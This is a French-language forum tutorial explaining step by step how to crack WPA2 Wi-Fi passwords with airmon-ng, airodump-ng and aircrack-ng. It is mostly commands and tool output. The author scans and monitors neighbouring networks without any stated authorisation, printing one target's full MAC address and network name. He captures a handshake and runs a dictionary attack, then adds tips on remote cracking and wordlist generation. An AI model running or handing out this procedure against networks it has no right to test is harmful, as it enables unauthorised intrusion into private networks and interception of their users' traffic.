[HowTo] Cracker un réseau WPA2

[Serphentas]

Salut

Comme vous le savez, je ne suis ni programmeur de renommée ni hacker recherché. Cependant, les attaques contre les réseaux Wi-Fi, ça me parle. Je vous montre donc quelques résultats et informations que j'ai récoltés au fil du temps.

Tout se passe sous BackTrack (version 5 R3). Pour une performance accrue, j'utilise mon ordinateur fixe. Puisqu'il n'a pas de carte réseau sans-fil, je me suis acheté un bon truc à 15$: $link$

On initialise d'abord l'interface wlan0:

Code :

ifconfig wlan0 up
airmon-ng start wlan0
airmon-ng stop mon0

Puis, on se renseigne sur les réseaux environnants:

Code :

airodump-ng wlan0

On obtient alors une liste de tous les AP ainsi que les terminaux qui y sont connectés: (j'ai masqué certaines informations avec des $$)

Code :

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                                                              
00:$$:E3:$$:64:$$  -26      183    15982    0   6  54e. WPA2 CCMP   PSK  $$$                                                                                                          
64:$$:D7:$$:47:$$  -52      287       32    0   1  54e  WPA2 CCMP   PSK  $$$                                    
80:$$:AB:$$:00:$$  -54      214        5    0  11  54e  WPA2 CCMP   PSK  $$$                                  
AC:$$:0B:$$:CD:$$  -65      169        0    0   4  54e  WPA2 CCMP   PSK  $$$                                    
24:$$:11:$$:42:$$  -67      247        1    0   1  54e. WPA2 CCMP   PSK  $$$                  
00:$$:C9:$$:7C:$$  -67      246       70    0   1  54e  WPA2 CCMP   PSK  $$$                                                          
00:$$:A6:$$:C9:$$  -70      311      297    0   8  54 . OPN              $$$                                                              
00:$$:A6:$$:CA:$$  -72       39      610    0   4  54 . OPN          
$$$                                                                                                                                                                                                                      

BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                                                                                                                                  
80:$$:AB:$$:00:$$  00:$$:20:$$:BC:$$  -54   36e- 1e     0       47  $$$                                        
80:$$:AB:$$:00:$$  18:$$:96:$$:B5:$$  -74    1e- 1      0       37                                                    
24:$$:11:$$:42:$$  C4:$$:FE:$$:2B:$$  -74    1e- 1      0       10  $$$                          
00:$$:A6:$$:C9:$$  98:$$:F7:$$:7E:$$   -1    1 - 0      0       26                                                  
00:$$:A6:$$:CA:$$  38:$$:3C:$$:3D:$$   -1    1 - 0      0        4                                                  
00:$$:A6:$$:CA:$$  84:$$:88:$$:14:$$   -1   11 - 0      0        1                                                  
00:$$:A6:$$:CA:$$  98:$$:82:$$:A9:$$   -1    5 - 0      0       44                                                  
00:$$:A6:$$:CA:$$  00:$$:04:$$:18:$$   -1    5 - 0      0       48

Le but étant d'obtenir le handshake lors d'une connexion d'un terminal à l'AP, on optera pour une surveillance des réseaux "bondés". Dans ce cas, l'AP dont le MAC est 00:$$:E3:$$:64:$$ semblerait optimal. Il ne l'est en fait pas, puisqu'après une longue surveillance on s'aperçoit qu'il n'y a qu'un client de connecté et un flot de données discontinu. On veut pouvoir attraper les utilisateurs qui se connectent, pas ceux qui sont connectés. On choisit alors l'AP avec le MAC 64:$$7:$$:47:$$.

On utilise toujours airodump, mais cette fois on restreint son champ d'analyse.

Code :

airodump-ng -c 1 --bssid 64:$$:D7:$$:47:$$ -w psk wlan0

Les arguments sont les suivants:
-c -> canal radio de l'AP
--bssid -> adresse MAC de l'AP
-w -> préfixe de l'output (.cap si format non défini)

On se retrouve alors avec ceci:

Code :

CH  1 ][ Elapsed: 6 mins ][ 2013-11-16 17:58 ][ fixed channel wlan0: 13              
                                                                                      
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  
                                                                                      
64:87:D7:02:47:59  -51   4      681       53    0   1  54e  WPA2 CCMP   PSK  oso-4998
                                                                                      
BSSID              STATION            PWR   Rate    Lost    Frames  Probe

Manque de bol, aucun utilisateur ne s'est connecté. Il faudra donc laisser le programme tourner quelques heures, voire quelques jours. Puisque cela prend forcément du temps, on va se mettre à analyser d'autres réseaux. Je vous déconseille fortement de faire cela à moins que vous ayez une carte réseau par AP "sniffé". En effet, l'antenne devra jongler entre deux canaux (ou plus) et peut alors potentiellment manquer un handshake.

Une fois le handshake trouvé, vous le verrez en haut à droite de la page: (fait sur mon propre réseau cette fois, car l'autre ne coopérait pas)

Code :

CH 13 ][ Elapsed: 48 mins ][ 2013-11-16 18:01 ][ WPA handshake: 00:$$:F6:$$:B5:$$    
                                                                                      
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID  
                                                                                      
00:$$:F6:$$:B5:$$  -40   1     2216    16952    3  13  54e. WPA2 CCMP   PSK  SAFIR    
                                                                                      
BSSID              STATION            PWR   Rate    Lost    Frames  Probe            
                                                                                      
00:$$:F6:$$:B5:$$  04:$$:95:$$:CC:$$  -127    0e- 0e     0    15487                    
00:$$:F6:$$:B5:$$  AC:$$:0B:$$:CA:$$  -127    0e- 0e   263     1145                    
00:$$:F6:$$:B5:$$  AC:$$:0B:$$:CA:$$  -127    1e- 0    708     1375

Notez que le handshake n'apparaît uniquement lorsqu'un appareil inconnu se connecte (et entre alors le mot de passe). C'est précisément à ce moment-là que la négociation (de la clef ?) a lieu. Si un appareil connu (avec mot de passe déjà enregistré) se connecte, vous n'aurrez pas le handshake.

Une fois le handshake en main, on peut procéder au crack:

Code :

aircrack-ng -a 2 -b 00:$$:F6:$$:B5:$$ -l key.txt -w /media/Data/18_in_1.lst /root/psk-01.cap

À nouveau, les arguments sont les suivants:
-a -> mode de crack (1 pour WEP, 2 pour WPA(2))
-b -> adresse MAC de l'AP
-l -> nom et format du fichier output (la clef)
-w -> chemin de la wordlist

Code :

Aircrack-ng 1.1 r2178


                   [00:00:09] 57144 keys tested (5881.08 k/s)


                       Current passphrase: 121212poohbear            


      Master Key     : 94 52 0A 5A 45 8A 20 4A 13 7B C2 62 8A 1C BF 89
                       53 A2 BB 4B 96 9E BD FF 64 92 4D 3D 8B 11 D9 F9

      Transient Key  : 48 76 A2 87 B0 38 E1 02 81 A5 82 04 2E 57 09 21
                       CB ED 2C 86 67 9A D6 E2 08 9B 60 7C 22 5E 82 28
                       2D 8A 16 35 3B B3 49 00 73 48 A2 E7 2F 28 61 B1
                       90 59 02 70 7E 96 A3 C2 AF 66 C0 E6 C1 35 F0 0A

      EAPOL HMAC     : E7 5B 6C 1D D0 D5 15 9B C3 D2 5D B2 4D DF 90 DC

On peut voir qu'aircrack teste une à une toutes les clefs de la wordlist. J'ai préféré utiliser mon ordinateur fixe car son taux de test (~5900 clefs/sec) est bien plus important que celui d'un portable, par exemple. Étant donné que l'on ne peut pas vraiment combler ce manque sur un portable, j'ai pensé à une certaine méthodologie:

1) Enregistrer l'output d'airodump sur un ordinateur distant en spécifiant un chemin réseau (envoyer le tout via Internet sera trèèès long)
2) Exécuter aircrack sur la même machine distante en spécifiant l'output vers le portable

L'idéal serait un accès SSH ou autre. Overclocker le CPU aide grandement. De plus, les CPUs hautement multi-threads seront avantagés (j'ai 6C/12T ici).

Puisque la wordlist n'est pas optimale pour la clef de mon AP, aircrack ne la trouvera probablement jamais. C'est pourquoi le choix de la wordlist est très important quand à l'obtention du mot de passe d'un AP. Vous pouvez générer toutes les possibilités de min-maj-num jusqu'à 16 caractères mais bonjour l'espace disque gaspillé. C'est pourquoi il faut faire une wordlist à base de mots (vbtrTdbbr%2+ est assez dur à mémoriser, comparé à djeanwifi251076). Je pense que trouver la bonne wordlist est plus dur que trouver le handshake (relativement simple, il suffit d'un peu de patience).

En ce qui concerne la création de worlists, crunch (Linux) et L517 (Windows) font très bien leur boulot. Le premier est plus complet à mes yeux. Une bonne explication de son fonctionnement: http://adaywithtape.blogspot.ch/2011/05/...h-v30.html

Bref, voilà comment ça se présente pour cracker du WPA.